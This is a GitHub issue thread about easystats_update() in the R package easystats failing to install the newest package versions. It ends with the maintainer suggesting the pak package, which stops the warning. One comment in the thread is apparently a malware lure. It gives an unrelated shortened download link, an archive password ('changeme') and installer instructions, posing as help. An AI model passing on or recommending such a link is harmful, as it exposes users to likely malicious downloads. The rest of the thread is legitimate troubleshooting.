### ISSUE TITLE
easystats_update() not pulling/installing most recent versions of packages

### ISSUE THREAD

**Issue by Mike-Todd** [easystats/easystats#431]
Lately, when I've loaded easystats using the `library` command, I've got message in the screenshot below. Quitting, restarting, and running the` easystats::easystats_update()` function didn't made the message go away, and neither did quitting, restarting, and then installing the individual packages via the plain vanilla `install.packages("[packagename]")`. 

Using `install.packages('[packagename]', repos = c('https://easystats.r-universe.dev', 'https://cloud.r-project.org'))` worked like a charm, however.

FWIW, I'm running R 4.3.3 via RStudio (v. 2024.04.2+764) on MacOS 14.5.

Just thought I'd let you know.

Thanks!

![image](https://github.com/user-attachments/assets/e5b1551c-7bc9-40d0-9b3b-06fac678e26e)

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by strengejacke** [comment]
Have you installed the _pak_ package? If not, please install it and try the update-function again. You may need to update to the latest _easystats_ package version, probably using the r-universe repo.

**Comment by Mike-Todd** [comment]
My apologies for not updating this thread. I installed `pak`, and the warning did stop appearing.  Thanks!

**Comment by strengejacke** [comment]
But still, `easystats_update()` _should_ work without pak installed. Maybe we find out how to fix this.
